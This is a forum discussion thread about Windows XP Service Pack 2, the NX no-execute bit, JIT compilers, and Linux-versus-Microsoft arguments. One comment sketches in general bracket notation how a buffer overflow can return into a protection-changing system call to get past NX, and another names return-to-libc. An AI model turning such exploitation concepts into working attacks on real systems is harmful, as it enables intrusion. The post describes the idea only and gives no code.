Re:Lets not bag on MS

Xandros does NOT break. If you install kde 3.2, the xandros home-built components like XFM stop working, this does not affect the underlying distro. It behaves like Debian, that's all.

Re:Lets not bag on MS

"Xandros does NOT break."

"the xandros home-built components like XFM stop working."

Re:Lets not bag on MS

[LousyPhreak]

but with linux there is at least two big differences:

you are not fixed to xandros, i use debian and can (and atleast did) boot 2.2 2.4 2.5 and 2.6 series kernels, so just switch your distro to one that fits your needs better.

also check when the last security stuff for the windows 95 generation (95,98,me) and older nt's (4 and downwards) was released. on the other hand even the 2.0 kernel is still maintained and updated.

Re:Lets not bag on MS

[dattaway]

Upgrading to 2.6 was not a forced security upgrade, but simply an option. Patching security with linux is a quick patch and restarting the affected service.

Does this Service Pack allow itemized upgrading? A reboot? Uninstalling broken patches? More than one reboot?

Re:Lets not bag on MS

[TRACK-YOUR-POSITION]

I don't see how Visual Studio .net and .Net Framework users can be considered a small minority. The thing is, Microsoft releasing a service pack that breaks everything is very different from a linux distribution breaking when the use decides to try to compile and install new software completely on their own--Microsoft is the equivalent of the whole open source community of programmers and distributors combined, so a new service pack isn't analagous to a new major release of the Linux kernel, it's more like a new minor release of a Linux distribution. And I'm not sure it's even like that, since a service pack upgrade is supposed to be a lot easier to do then installing a Linux distribution release--so it's more like an distro-released security fix. Which isn't supposed to break everything. I don't know anything about the specifics, but there are memory-protecting kernel patches out there for linux, like PAX and grsecurity and probably a bunch of others. You have to disable them when running Java and X, so I imagine Java will be effected by this update.

Re:Lets not bag on MS

so are you saying Xandros is a distribution or Xandros is merely a set of components?

The original post said Xandros was a distribution. Why are we changing things all of the sudden? Maybe because you realize that you were wrong in your assesment?

Re:Lets not bag on MS

[mangu]

When this same problem affects many Linux distributions.

I don't know this Xandros you mention, but it's not a good comparison. Try comparing MS to the Linux kernel. Saying that one Linux distribution breaks and blaming it on Linux is like saying one application written for MS-Windows is broken and blaming it on MS. This could be a valid claim in some cases, of course, but you are comparing apples to oranges.

Re:Lets not bag on MS

Windows .NET Framework applications do not currently mark generated code with Execute permissions. XPSP2 recognizes the current, shipped versions of .NET Framework and runs them with NX off. Therefore existing .NET applications will continue to run. Microsoft is enhancing the .NET Framework to take advantage of NX and will ship service packs for each of the shipped versions in the XP SP2 RTM timeframe. The .NET Framework "Whidbey" will innately support NX.

Re:Lets not bag on MS

[The-Perl-CD-Bookshel]

Not to mention, it is all free. Cut Linux some slack.

Re:Lets not bag on MS

you are not fixed to xandros, i use debian and can (and atleast did) boot 2.2 2.4 2.5 and 2.6 series kernels, so just switch your distro to one that fits your needs better.

some of us don't have the luxury of changing a distro as often as we change our shorts

Re:Lets not bag on MS

[skinfitz]

Upgrading to 2.6 was not a forced security upgrade, but simply an option.

Installing XP SP2 will not be a "forced security upgrade" either but also "simply an option".

Re:Lets not bag on MS

[ortholattice]

But lets not bag on MS with general crap, this affects Linux too.

Linux has a tremendous advantage that MS doesn't have. Because they are GPL'd, most major apps can be (and are) included in standard distros and verified to work in advance by the distro integrators (RedHat, SuSE, etc.) prior to major releases. It is all released as one big integrated package where everything works together, and for the most part everything you'll need is just there. Only now and then you might need a rarely-used specialty app that isn't included in the standard distro.

In contrast, getting a usable MS system might involve proprietary programs from a dozen different companies. Every time you upgrade the MS system, there is no guarantee that none of your third-party apps will break, and you are the one who has to make sure that they work together. You may have to test them all, check out each vendor's release notes, install updates (sometimes for a price) to ensure compatibility, and so on.

This is also a problem when you have to reinstall Windows from scratch (without a system recovery disk frozen to a specific configuration, that may no longer work when you've swapped some hardware). Installing Windows itself is often the small part of the project. It might take a good part of a day to install your third-party apps in a highly unautomated way that requires you to type in CD keys and so on. People sometimes compare the time to install Linux to the time needed to install Windows, then ignore the time needed to install all the Windows apps.

Unfortunately MS is stuck between a rock and a hard place. They can't integrate in the functionality of all the third-party apps that Linux distros have by default without antitrust accusations.

Re:Lets not bag on MS

[avdp]

Not unless they backport all security fixes to XP SP1

Re:Lets not bag on MS

[Jarnis]

Actually their policy is that they WILL backport all security updates to SP1.

They support current and previous Service Pack level. Meaning right now all security related patches are published to original XP and SP1. Once SP2 is launched they support SP1 and SP2, but if you still would prefer to run untouched XP (why?), you'd be out of luck.

SP2 becomes non-optional after SP3 is launched.

This is rather recent change, so I don't actually know how it works regarding Windows 2000 - I know lots of places which are still running 2K SP1.

Re:Lets not bag on MS

[PhotoBoy]

So this means Java will be broken but .Net won't be? I guess in about 5 years time we'll be seeing another anti-trust case again MS get to court.

Re:Lets not bag on MS

[TheRealMindChild]

This is WHY there is a push to call these "Linux Distrobutions" GNU/Linux. You expect your "linux" operating systems to just be a collection of packages meshed together, all pretty independantly.

But an operating system is usually more then that. Take windows for instance. The core of the OS is just a bunch of DLLs and some kernel mojo. But it has a lot of applications that tightly make everything work. And you can make inferences about things.

Just because something uses the linux kernel, doesnt make it "linux"

Re:Lets not bag on MS

[rufo]

some of us don't have the luxury of changing a distro as often as we change our shorts

What about changing our shorts as often as we switch distros?

Re:Lets not bag on MS

[wattimus]

Not only that but you can tell it to upgrade everything on its own!!!! YAY

Re:Lets not bag on MS

[The+Vulture]

My guess would be probably not. And yes, although I'm a cynic, the reason I say this has nothing to do with the DoJ possibly letting it slide.

If I recall correctly, most of the original slap against Microsoft with regards to Java, was that they played dirty. In this case, Microsoft actually isn't playing dirty (from what I see thus far), they're giving out the information (at what monetary cost, I don't know) to application developers on how to prepare their applications for the new Service Pack.

Therefore, Sun doesn't really have any grounds to take them to court. As long as Microsoft publically announces what they're doing, and makes the information to the application developers, then it is Sun's responsibility to make Java work with Service Pack 2.

Personally, I think it's in Microsoft's best interest to not do work-arounds for any applications, but rather just publish the information, and give the application vendors some time to prepare the fixes. At least in that way, Microsoft can be seen as being neutral, and not playing favorites. If application "foobar" doesn't work under SP2, then at least Microsoft could say, "talk to the application vendor". Whether or not that would be a big blow against Microsoft, well, it's hard to say.

-- Joe

Re:Lets not bag on MS

[addaon]

But they're (again) doing one of the things they were convicted for, using internal, unpublished APIs and going out of there way (presumably) to make those APIs accessible to their competitors. .NET deals with the problem by flipping a magic flag; Java doesn't have that option.

Memory Protection?

I have been waiting for this for a long time, glad to see it included in sp2.

Re:Memory Protection?

[LousyPhreak]

yea but can windows protect its own memory?

(see blaster and the likes)

Re:Memory Protection?

yea but can windows protect its own memory?

Windows will use a feature of X86-64 which provides protection in hardware. The catch? You need an X86-64 CPU to receive buffer overflow protection. A bit has been added to page table entries which allows them to be marked as non-executable. Instead of buffer overflows, you will receive some type of page fault exception.

Intel already supports a similar protection mechanism for segments, but it's not really used by most operating systems (none that I'm aware of).

The "unsecure" list

[acostin]

Open Office, Mozilla, Java based applications, Apache with PHP, and other applications written by a bunch of programmers without a management control :)

Re:The "unsecure" list

I'm not sure why this is funny, anyone care to explain?

Re:The "unsecure" list

[BoomerSooner]

It's a list of unsecure applications that the new MS XP SP2 patch will break. Kind of like running Windows 3.1 on DR-DOS, it will not work.

Re:The "unsecure" list

but none of those applications are actually incompatible with Windows. its just a lame MS bashing troll

Re:The "unsecure" list

[drinkypoo]

There are ways to get Windows 3.1 to work on DRDOS. In fact Digital Research released a DR-DOS update for just that purpose. It is not supported by microsoft, however.

Re:The "unsecure" list

Gee- I could run win31 under DrDos, Software Carousel too. What came out eventually was that MS sniffed that it was running DrDOS & tossed bogus error messages.

I first met MS in the early 80's, before they had produced DOS. Their product was a CPM release that ran on an Apple][ with a Z80 co-processor. MS ignored the 48k boundary on the apple & the machine would crash after you'd put in enough data. MS's comment when I reported the bug...Buy The Upgrade!

So, they've had that business model longer than they've had DOS.

They'll make money off the insecurity of their recent work too-you bet.

Re:The "unsecure" list

[Zork+the+Almighty]

There was no legitimate reason for Windows 3.1 not to work on DR-DOS. Windows detected DR-DOS and returned an error, but a hack to remove this check would allow Windows to run on DR-DOS perfectly. Microsoft did this specifically to eliminate a competitor.

some funny quotes

[stonebeat.org]

From the article @ Windows XP SP2 could break existing application
according to Tony Goodhew, a product manager in Microsoft's developer group:

"SP2 will break some applications because they are insecure," he said. "Security is important, and it is not just a Microsoft problem but a developer community problem. We all need to work together to create a more secure computing environment."

"It doesn't really matter how long it is going to take you to do the work; security is an important issue, and developers need to start doing that work now," Goodhew said.

Re:some funny quotes

[khakipuce]

Someone has to say it...

If we could see the source we could work with them, if the developer community cannot see inside the the functions they have to call they cannot be certain that the call will have an outcome that does not case a security hole

Re:some funny quotes

[julesh]

Which is what happens when you let a product manager talk about technical issues.

There applications that will break are _not_ (necessarily) insecure. They just behave in a way that makes it impossible for Windows to tell isn't somebody trying to execute some code in an overflowed buffer.

Typical MS press relations, blame everyone else.

Re:some funny quotes

Of course it's a problem with letting those product managers talk, everyone knows that IT Journalists are at the peak of technical ability in the software field.

Yep it's not like the journalists could have mis-understood something like this or maybe manufactured the quote. Silly me I should have realized that the journalist writing the anti-Linux article at the BBC had a perfect understanding of CS issues.

Damn those product managers, damn them all to hell...

Re:some funny quotes

How is this funny? This is perfectly logical. He's basically saying, "Yeah, we didn't make the most secure product. We're trying to fix this! But you can't expect a completely secure OS if the programs you're running leak like a sieve. So those might need a re-write."

Re:some funny quotes

[Sycraft-fu]

They are right to be blaming the developers. NT has always had different flags for read and read/execute areas of memory. However, it never has run on a platform that supported them, so read/execute was automatically mapped to read. That does NOT mean that you shouldn't take the time to set it properly for future compatibility.

Now since processors finally DO support it, they are taking out the mapping for the processors that can use it. So if you bothered to flag shit properly in your code from the beginning, you're good to go. If you didn't, they are warning you that you need to get working on it before SP2 comes out.

I don't really have much sympathy for developers of any OS that don't follow the spec. Whatever the spec is in the OS, use it. Maybe a certian version allows you to get around it, great, doesn't mean it will always be that way. Games that ran in Windows 98 but broke in 2k were a great example of that. 99% of the time it was because they used some trick, often involving direct hardware access, that 98 allowed, but was against the spec. If they'd stayed in what was allowed by Win32 and DirectX (or OpenGL), they'd have probably been fine.

"Insecure Applications"?

[Nobody+You+Know]

"the upcoming Windows XP Service Pack 2 could break some 'unsecure applications.'" I thought service packs were supposed to FIX the operating system.

Re:"Insecure Applications"?

[jamshid42]

It is apparently making changes to certain dll's or something that is changing the format of certain APIs within the OS. Hence, the application no longer functions properly. API calls are a part of the OS.

Re:"Insecure Applications"?

[Slack3r78]

Look at what you just wrote. Service packs fix the operating system. What I see this as meaning is it will break applications that were written in an insecure manner, most likely using undocumented APIs.

In the past, when MS has updated the OS, they've often worked kludges in to make sure they don't break applications that were doing things that they weren't supposed to be doing. With the new focus on security, Microsoft has likely put an end to such kludges and things are going to break. I'm not surprised, and it doesn't really bother me.

Really, most of the posts I'm seeing are giving Microsoft a hard time about this, but how is it any different from the kernel developers refusing to freeze a driver API, which in turn occassionally causes drivers for some hardware to break? It happens, and it's really out of Microsoft's hands if they're focused on building a more secure OS than what they have now. I'm sure Microsoft's own products will be patched at the same time SP2 is released, and so long as they provide a changelist which would allow developers to fix apps that might break, what's the problem?

Re:"Insecure Applications"?

[AndroidCat]

most likely using undocumented APIs.

Probably a lot involve security restrictions like locking down %windows% directories for non-admin users, as well as HKEY_LOCAL_MACHINE in the registry. These were supposed to be done years ago, but many app writers weren't going to do it until Microsoft cracked the whip.

Re:"Insecure Applications"?

[thebes]

This will fix the OS. Think about it, either they break the existing applications now, or they add more hacks to the OS source code to prevent the applications from being broken that exist today, or they allow more applications to be designed around these security issues, and then have to break them later. They should have done this along time ago, and at least they're doing it in one large roll-out instead of little bits here and there. I think this'll be the best that microsoft can do right now.

Re:"Insecure Applications"?

[alexpage]

but how is it any different from the kernel developers refusing to freeze a driver API, which in turn occassionally causes drivers for some hardware to break?

The difference is that with an Open Source kernel, you can see and change the API you're using, and with Open Source applications, you can change the things which are breaking yourself. Also, with Open Source, you can apply the security fixes which won't break your system and hold back on the ones that will, meaning you can come to compromises - at the end of the day, you have more control over your system. And with Free Software, you can distribute these changes yourself so others can benefit.

I'm not saying that Microsoft causing these breakages is not a necessary step, or an unwelcome one, but I don't think it's directly comparable to the Open Source and Free Software world.

Better security is good

[hattig]

Sounds like an issue with NX bit implementation on A64 ... this protects memory that is tagged as data from being executed (which protects against buffer overrun exploits, which are 50% of the MS security issues). This would affect .NET, Java, etc. However I'm sure that there is a way to fix this for these types of application!

Regardless, enforcing decent security like this is good.

Now all the hackers will have to try other methods of hacking windows, heh. I'm sure that there is no shortage of them!

Re:Better security is good

[julesh]

Yes, as discussed in the previous article, these types of applications will need to use the VirtualProtect() API to tell Windows to make their pages executable.

Unfortunately, this will mean patches will have to be released to just about everything that does this. Presumably, MS will include a patch for .NET along with SP2 (?), but if you need Java you'll probably have to wait for your JVM vendor to issue an upgrade...

Re:Better security is good

[Helvick]

The NX support is only one of the major changes and it will only affect AMD64 and Itanic for now. The lack of NX in Prescott's "IA32e" extensions is listed here by an intel source and discussed in detail in this thread on Ace's Hardware. This unofficial comment in that thread might lead a true conspiracy theorist to conclude that there might be widespread issues with turning on NX support right now. Reading MS's Developer overview for SP2 here also gives the impression that NX related problems will not be easy to workaround, at least for non open source apps\drivers. The fact that AMD haven't been making any effort to try to market the NX capabilities in AMD64 outside of the enthusiast market could be explained if there are major issues with SP2.

The RPC and DCOM changes are much more likely to have wider impacts - especially for enterprise applications.

The ICF changes are fairly light (unfortunately in my view) and not that hard for end users\admins to modify so even if there are issues workarounds will be fairly simple.

Re:Better security is good

Is NX available in 32bit mode of 64bit CPUs? If so, you are assreamed by MS as no NX for Windows 2000 Service packs are planned according to Mike Howard at MS.

Re:Better security is good

[Helvick]

Now that I look at this in detail it seems that XP SP2's NX support requires PAE support to be enabled. PAE is an Intel x86 hack to allow access to a 36bit memory space. M$ only support it on W2K Advanced Server, XP and W2K3 so unless that policy is changed in a future SP then you're probably right.

PAE is not native 64bit mode though - and 64bit'ness isn't required for it. Lack of NX in consumer Intel processors clearly has nothing to do with 64bit support as such. Since NX support is fairly simple and provides such an easy marketing benefit (Roll UP! Virus Proof Processors (TM) yadda yadda ..) it does all seem to indicate that Intel know that enabling NX support will break lots of legacy hardware (and maybe software if the MS comment about Delphi is accurate). Their decision to wait until Tejas (late Q1 2005) before having it in consumer oriented procesors gives the hardware market time to build and debug reliable PAE supporting drivers and apps thanks to AMD.

Re:Better security is good

I run 2000 Advanced Server, does that mean I will get NX in a future SP?

Re:Better security is good

... this protects memory that is tagged as data from being executed

Hattig, your comment makes me think of a problem
with languages like python: In python you
can create a variable which can also be a
python interpreter in its own right. Such a
variable can execute code passed to it. Would
such a thing work with the feature in Athlon 64
processors enabled?

Re:Better security is good

[rabidcow]

Sounds like an issue with NX bit implementation on A64 ... this protects memory that is tagged as data from being executed (which protects against buffer overrun exploits, which are 50% of the MS security issues).

Not really. Not alone anyway.

This would affect .NET, Java, etc. However I'm sure that there is a way to fix this for these types of application!

And that's why. If the system call that JIT compilers use to switch protection off can be found, you can just manufacture a call to it on the stack, and make it return into your buffer.

This changes the exploit from:

[buffer] [return address]
[code] [points into buffer]

to:

[buffer] [return address]
[code] [address of system call] [parameters] [points into buffer]

Slightly more difficult, but not terribly useful by itself. Now if they put that system call in an ASCII armour area, or moved it around a lot, that would do the trick.

Re:Better security is good

[SLi]

Yes. Python doesn't (currently) do any kind of JIT compiling and is therefore purely an interpreted language and won't be affected by this change. To explain a bit further:

Basically we can divide programming languages (and environments) into compiled languages and interpreted languages. Compiled languages are usually fast but in many ways unsafe and the resulting programs are harder to observe. Interpreted languages are slow but observing and debugging the program is easy. Also a compiled program can only be run on a single architecture without recompiling while interpreted programs can be run on any architecture for which an interpreter exists.

Now there's a special class of languages that are compiled to bytecode which is closer to actual machine language than the source code yet independent from architecture. The resulting bytecode is run in a virtual machine (VM), which still has to interpret or compile it.

Often interpreting the bytecode is even slower than interpreting the original language. However, compiling the code and then running it only once is usually even slower than interpreting. The solution is to compile the code just in time (JIT) when it has possibly already been interpreted a few times and it seems likely it will be executed again and again. This way only the speed-critical parts of the program will ever be compiled, resulting in performance (arguably) close to compiled languages without tying the program to a single architecture.

Now, just as for any other compiler, from the JIT compiler's point of view both the bytecode and the compiled, machine-executable code is pure data. So the problem arises when the VM suddenly wants to transfer control from its interpreter code to the JIT-compiled code. The operating system has taken care of marking all the VM code as "OK to execute" when the program was started, but now no-one, unless the VM, has told the operating system that the new code is OK to execute. Therefore the OS cannot distinguish it from a case where a malicious user has fed machine code to a program as data and used a flaw in the program to jump into it, which is the way most common exploits work.

As for Python, I wouldn't actually classify it into bytecode languages, at least not yet. AFAIK the "bytecode" that Python scripts can be compiled into is more like a parse tree of the program than machine code, and the Python interpreter still purely interprets it. No generated machine code is executed at any point in time and hence the above scenario doesn't apply.

Re:Better security is good

[Foolhardy]

In languages like Python that can treat code as data, the code is not stored in the binary form the CPU executes, but as a list of instructions for the language's interpreter. So, as far as the CPU is concerned, those pieces of code are really data.
If the code was compiled beforehand, then the reference to the code structure will be a pointer to the actual function, stored with the rest of code.
If the language has a JIT (just-in-time compiler), it has a risk of being broken, as mentioned earlier with the .NET JIT. It will have to be aware of the NX flag and set it explicitlly.

Re:Better security is good

[hattig]

Quite possibly ... under an NX enabled OS. You'd have to use abovementioned ways around it.

However ... I'm not familiar with Python, sadly (I'm a perl whore). So I'm not certain about variables that are interpreters, etc.

Re:Better security is good

uhm, wild speculations abound... putting a feature (like NX) into the CPU has NOTHING WHATSOEVER to do with how it is used by any given OS (and i'll forget about the fact that NX specifically has to be enabled in an MSR to be useful at all). in practice there's nothing to force an OS to enable NX and NOT USE IT AT ALL, that is, create memory pages with NX set to 0 (effectively making all pages executable like it's been so far). then you can slowly begin to turn it on for apps that can happily work with NX. MS made a huge leap by actually going one step ahead and marking the stack/heap areas NX *by default*, you cannot underestimate the importance of this policy, EVERY SINGLE script kiddie/hacker/etc will be forced to write new kinds of exploits, using a technique called 'return-to-libc' which is anything but trivial and can be just plain impossible in given bug situation - i'd call that quite a progress.

Re:Better security is good

In theory, ia32 code running on an Opteron in legacy mode could use the NX bi in the page tables.

But I doubt anyone is going to bother. A 64-bit kernel running all 32bit applications may not get you above 3gig/application, but it means the kernel can direct map all of physical memory, instead of having to window it in as needed.

All upside, unless you're stuck with Intel's ia32e with no NX bit at all.

Re:Better security is good

Good god. "progress".

My Linux boxes have been running Solar Designer's no-exec stack patch since 1998!

Though I suppose MS being only 6 years behind is progress of sorts.

Here's more info on what SP2 is about

[ClippyHater]

Microsoft has a nice bit of info for developers. All in all, I'm pretty impressed with the work and thought they've put into this SP--should make the world just a little bit safer for computing (of course, only for the folk running XP, the rest of their offerings don't have any of this as far as I know).

More work.....sigh.

[wongqc]

Without doubt, countless QA software testers & coders will cry out in anguish over this.....more work for them to do. But if they want to sell their software on the large Windows desktop market....They have little choice in the matter.

For each software build, we have to test against the various OS versions, and different service packs builds. Not fun...

You cannot make an omelet without breaking eggs.

[Kalroth]

I really like the direction Microsoft is heading.
Granted it was needed as their reputation, in regards of security, has always been low to none.

I really hope this will rid Windows XP of future remote exploits, since that's still the biggest threat Windows is facing.
Having said that, this wont fix all security problems, there will always be the luser that executes whatever is mailed to him/her, but it's still a step in the right direction.

The blind leading...

[thestarz]

Fortunately for us, they are offering a course to guide the unsecure masses.

The blind leading the seeing?

Re:The blind leading...

[cybermace5]

If you were trapped total darkness with no flashlight, the blind person is who you'd want to lead you out...when you're surrounded by utter stupidity, you want whoever is the most familiar with it to lead you out.

Re:The blind leading...

[LousyPhreak]

so wait...

are you implying i should get SCO unixware?

Re:The blind leading...

[AnomalyConcept]

Actually, there is some truth in the statement, depending on the scenario. Usually people who lose one sense (say, vision), have adapted and have higher abilities with their other senses. Some blind people can even determine the shape of the room, the materials from which the walls are made of, and possibly obstacles that lie in their path just from hearing. Whether it is true in this particular case, I'm not holding my breath.

Re:.NET framework

[SlightOverdose]

Obviously never had to use MFC then eh? .NET provides a nice clean set of APIs that aren't retarted.

Re:These are a few insecure programs that won't wo

[igloo-x]

iTunes
QuickTime
RealPlayer

Fuck, where do I sign?

Where do you get the Beta

[mpn14tech]

I read an article about this yesterday and wanted to test it against some apps where I work, but could not find the download for it on the Microsoft website. Do you have to have an MSDN subscription to get it. Seems rather rather screwy that if I want to make sure my app works with Microsofts OS I pay to them an extra $500 for the privilege. Maybe this is the new money making model. Profits are down this quarter, lets go break some code and charge them for how to fix it.

Re:Where do you get the Beta

[r_cerq]

if I want to make sure my app works with Microsofts OS I pay to them an extra $500 for the privilege.

In a commercial software world, it does make some sense; think of it from MS's POV: "If you're going to profit from an application which needs our applications/OS to work, you might as well pay for the priviledge of being able to market it as soon as our OS/SP comes out. Oh, free (as in beer) software? Screw you, then.". It's not like they need it, but it a good excuse

Re:Where do you get the Beta

Download link to XP SP2 beta. Maybe you should ask google before you spread FUD. http://www.geeknewz.com/modules.php?modid=5&action =show&id=4

Re:Where do you get the Beta

i guess this is a Microsoft approved download site right ?

its one thing to install beta software, its another to install beta software from a warez/unauthorised site

Re:Where do you get the Beta

[Repugnant_Shit]

What? The reason Windows is so popular is because of everyone who develops software for it. Microsoft is using inertia (and the difficulty and cost of porting to software to lower-cost platforms) as a way of charging developers more money. Developers are what make a platform successful, not the technology. Look at how popular Win95 was, and from a technical standpoint it *sucked*, but it had applications!

Re:Where do you get the Beta

Maybe this is the new money making model.

No, this is the same old money making model. Every new version of Windows (and DOS before that) has broken at least a few applications.

This might be welcome if it does indeed tighten up Windows security BUT what are they gonna do about the stupid design decisions made in their applications (IE, Office, Outlook et al)?

Re:Where do you get the Beta

Sure it sucked but what other OS was available with a good UI? None. Don't fault them for having no reasonable competition. :)

'Tis a gentle touch of irony...

[jkbuha]

...when one realises that most of this effort is fruit of a tiny 5kb worm which actually had asked mr gates to repair his software... I'm still working on my sig

I like it

[SlightOverdose]

First, they decided to postpone Longhorn "Until it's done", rather than releasing a shoddy product early.

Second, they've gone so far as to break application compatibility in order to clean up a number of deeply embedded security holes in Windows.

Personally, I think this is a Very Good Thing(tm). Microsoft may finally be "Getting it"

Re:I like it

[AndroidCat]

Hopefully they're cracking down on all the apps that have to run as admin. If all those users who open up strange attachments didn't have authority to play with the %windows% directories, there'd be a lot less 0wn3d boxes on the net.

I bet that most of the things broken should have been fixed back in the NT5 guidelines pre-Win2000.

Re:I like it

[naelurec]

The only thing they get is the bottom line.. the biggest issues with Windows is spyware & viruses (for the majority of people). These are HUGE issues for both home and business users.

Here is what I see -->

My KDE 3.2 desktop ease of use is right up there with other operating systems .. I have people using my system all the time -- everything from children to senior citizens (70+). The fact that I can install Linux MUCH EASIER than Windows (pop in Knoppix CD and initiate a HD install) and it doesn't have the two biggest problems that Windows has (spyware & viruses) and it has the "major apps" that are needed (web browsing, spreadsheets, word processors, email, im, etc..) is HUGE.

Microsoft is definitely getting it -- if they don't release quality products, their market share will erode.

Re:I like it

[SlightOverdose]

Im hoping that once .NET takes off, Outlook will only open .NET executables. Since they run in a VM, they can be restricted.

You could configure it so all untrusted code was restricted.

(Try running a .NET exe directly over a windows share if you want to see it in action. If the program tries to access the local filesystem it gets an Exception).

Re:I like it

[SlightOverdose]

Exactly. Microsoft are between a Rock and a Hard Place (Linux and OSX respectively :p).

As has been shown previously, they can produce some good code when the pressure is on (Who are we kidding- MSIE was a whole lot better than Netscrape Navigator).

Of course once (if?) they squash the competition, they will go back to their old ways.

Re:I like it

[Spoing]

1. Personally, I think this is a Very Good Thing(tm). Microsoft may finally be "Getting it"

While I agree, I'm becomming a strong advocate for looking at the world from the point of base motivations.

Microsoft is primarily motivated to keep stock prices going up -- or at a minimum -- stable.

If these changes become too painful for those who don't care about security, it will cause a decrease in the deployment of Windows XP and XP-specific programs.

If this happens -- or may happen -- Microsoft will do something to make people happy...even if that means back stepping.

That said, I can see them putting out XP SP2 (forcing the app vendors including MS themselves to deal with security) and then offering a variety of moderately painful workarounds. Ideally, the workarounds would break with each minor update, forcing the security issue.

Putting the changes in XP only, though, does fit with Microsoft's motivation to get people to upgrade. Now they can say "well, W2K is not nearly as secure as XP", even though they could back port the changes to W2K -- though there is no motivation to do so.

From motivations, though, it's hard to beat OSS on security. The code is there, and if something is not secure it will be made secure because the developers are personally driven to make it so.

(ObDisclaimer: Keeping in mind that security is always a process not a product. Tools can be handy or even critical, though how they are used and why is much more important.)

Re:I like it

[SlightOverdose]

I think it's becoming clear to Microsoft that the swiss cheese known as Windows is a joke in tech circles, and if they don't clean up their image they will start to choke (if they havn't already)

Re:I like it

[Spoing]

1. I think it's becoming clear to Microsoft that the swiss cheese known as Windows is a joke in tech circles, and if they don't clean up their image they will start to choke (if they havn't already)

Agreed, though the only reason that matters to MS is that it impacts stock prices. Everything else is way down the list as far as being a motivator.

That said, there is a weakening of the heavy default 'Of course we will use Windows/IE/Outlook/Word' bias in non-geek circles...though not much of one. If this becomes stronger or a 'me too' attitude starts to appear irt open source and/or Linux, this could change rapidly.

Doing minor demos of Linux raises quite a few eyebrows, though Linux and OSS are still alien concepts to most.

The biggest problem I encounter is that people assume I'm using Linux and OSS out of an anti-Microsoft stance...though in my circle of technical friends I'm the one who complains the liest about Microsoft! (OK, complains the liest off-line.)

Re:I like it

[Chester+K]

Hopefully they're cracking down on all the apps that have to run as admin.

It's been a requirement for Windows XP Logo Certification (maybe even Windows 2000 certification, but I'm not sure) that your application has to run under a normal user account.

Of course, for apps that don't get logo certified, I don't think there's much Microsoft can do to force them to work. :( At least all over MSDN they recommend many times that when you use Visual Studio, you should do all your developing under a normal user account so you don't code yourself into an Administrator-only hole.

Re:I like it

[The+Vulture]

Slowly but surely, OSS is getting out there. My anecdotal evidence:
One of my co-workers was using Internet Explorer (under Windows XP), and complaining about all of the pop-up windows. I brought him over to my Windows 2000 machine and showed him Mozilla. I told him about the pop-up blocking, showed him the little icon in the toolbar that is displayed when pop-ups are blocked, and showed him tabs. Just a quick demonstration, maybe two minutes at most.

He switched that afternoon. About a week later, he went up north to visit some of his relatives. When he came back, he told me how he showed them Mozilla's pop-up blocker, and his relatives switched too!

So, I think that little demos are the way to go. Don't pressure a switch to Linux, work at switching the applications first. Once the person is standardized on running applications that exist on both Windows and Linux, then they might be more comfortable with Linux.

-- Joe

Re:I like it

[Spoing]

1. So, I think that little demos are the way to go. Don't pressure a switch to Linux, work at switching the applications first.

Yep. I get the occasional "Microsoft is everywhere, so why bother?" comments, and I've gotten into the habbit of either smiling and not saying a word or giving a demo and not commenting on Microsoft at all. Silence or not contradicting them makes people curious and I don't have to spend time arguing this over this type of sillyness.

As for switching folks over, I've had sucess with my father after I installed Firefox (when it was Pheonix) and gave both he and my mom a 10 minute demo.

What really did it though is that I first found out what sites they like to visit, put them a bookmark, and set the home page to the bookmark. After they switched, I cut the confusion even more by using a custom wallpaper that has text on it with arrows ("click this to connect to the Internet", ...).

He is concerned about security now, but won't leave Windows. He is hoping that I have a silver bullet that can prevent his financial information from being stolen...and while I am thinking about that, I also know that neither of them want to have any changes at all to what they have.

Having said all that, demos don't always sink in. For example: One person kept referring to KDE on my laptop as XP. I must have said "I'm not running Windows; this is KDE and Linux; Not XP." about 30-40 times over 3 weeks before it sunk in. He even kept calling KDE XP moments after I told him it wasn't!

The same person keeps thinking that the web cam he has will work perfectly if only he gets a faster computer...though he and his family in another country have dial up. No demo of that fact, so it is taking even longer.

Re:I like it

[Gentlewhisper]

ICQ Pro does require admin rights to work... :D

Re:I like it

[TheNetAvenger]

Hopefully they're cracking down on all the apps that have to run as admin

Actually, this is being addressed. Read the papers on changes.

Start doing that work NOW!

[cha0t1c]

' In a quote from Tony Goodhew, a product manager in Microsoft's developer group says 'It doesn't really matter how long it is going to take you to do the work; security is an important issue and developers need to start doing that work now.' Let's see how this works.., We have a broken security model so the onus is on you to fix your apps because of our piss poor planning (ease of use vs security/functionality) Hmmm...,

Re:Start doing that work NOW!

[KarmaMB84]

How would MS fix someone else's app besides not improving security in the operating system? To call MS's security model broken and at the same time rant when they start fixing it is a bit odd...

Re:Start doing that work NOW!

[jimbolaya]

""Microsoft is finally starting to favor security over functionality."

They that give up functionality to obtain a little security deserve neither functionality nor security.

Yeah, or something like that.

Re:Start doing that work NOW!

[ozric99]

To call MS's security model broken and at the same time rant when they start fixing it is a bit odd...

You're new here, yeah?
(Yeah, I know, I know, +1 Redundant) :)

This may affect Linux as well as MS

[Azureflare]

But unfortunately with many apps that run on Windows, you don't have the source code for those apps for a recompile if they do get broken. Sorry Anonymous Coward, we have to bag MS on this one. They are going to cause a lot of grief by doing this, and a lot of companies will not upgrade to SP2 to avoid that grief. Anyway I think people should stay with windows 2000 as an operating system of choice in a business type environment.

In the past, MS has broken Windows 95/98 applications, but Windows XP/2000 had compatibility modes available for the older applications. If it is as they say, and newer apps will be intentionally broken without any way of going into a compatibility mode, this will be bad.

I have difficulty believing MS would not include some kind of compatibility mode, however. It'll be interesting to see what they do. It won't really affect me though, I don't use XP and can't stand that OS (Windows 2000 is still my favorite Microsoft OS; Windows XP is just 2000 with some pretty GUI changes and some compatibility fixes.)

Re:This may affect Linux as well as MS

[GoofyBoy]

>But unfortunately with many apps that run on Windows, you don't have the source code for those apps for a recompile if they do get broken.

You don't, but someone does. MS is offering courses in how to upgrade. The patch is not going to be out there until mid-2004. If you are using Windows in the first place, then reliance on a third party software company is not you main issue.

>They are going to cause a lot of grief by doing this, and a lot of companies will not upgrade to SP2 to avoid that grief.

So did Linus when he released kernal version 1.0.

Re:This may affect Linux as well as MS

IT IS NOT MICROSOFT'S FUCKING FAULT IF AN 8 YEAR OLD APPLICATION HAS NOT BEEN PATCHED TO WORK IN XP.

Closed source or not it is that companies responsibility just like an open source application to provide a compatibility update to an OS. That or you are required to upgrade to the newsest revision which might cost some $$$$. That again is NOT Microsoft's fault but the vendor who's application chooses to charge you for a new revision.

Re:This may affect Linux as well as MS

[Glendale2x]

Anyway I think people should stay with windows 2000 as an operating system of choice in a business type environment.

